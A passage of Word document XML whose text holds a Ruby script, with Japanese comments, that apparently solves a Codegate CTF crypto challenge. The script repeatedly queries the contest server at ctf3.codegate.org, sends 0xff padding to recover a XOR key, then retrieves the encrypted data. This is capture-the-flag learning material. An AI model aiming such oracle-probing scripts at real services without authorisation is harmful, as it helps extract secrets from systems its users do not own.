          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  buf.each_with_index {|b, i|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    puts if i % 8 == 0 &amp;&amp; i != 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    #print "#{b.to_s(16)} "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    print sprintf("%02x ", b)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  puts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  $stdout.flush</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def get(str)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  s = TCPSocket.new("ctf3.codegate.org", 20909)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  s.gets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  sleep 0.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  s.print "#{str}\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  sleep 0.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  buf = []</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  loop do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    l = s.gets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    break if l == nil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">    buf += l.chomp.split(" ").map{|h| h.hex}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  buf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># 0x00</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を送ると、サーバ側で</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>が終わってしまうので、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># 0xff</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を突っ込んであとから戻す作戦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>null = "\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># get key data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># 0xff</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を突っ込んで、</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイトの部分の鍵を取り出す。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>key = get(null * 100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>key = key[4, key.size-1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>key = key.map {|b| b ^0xff} # 0xff</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で鍵を取り出しているので、もとに戻す</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>dump key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># get encryption data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># 1</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>文字だけ文字を入力。かえってくるデータの</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト目が暗号化されたデータ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>src = get(null * 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>src = src[4, src.size-1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>dump src</w:t>
      </w:r>
    </w:p>
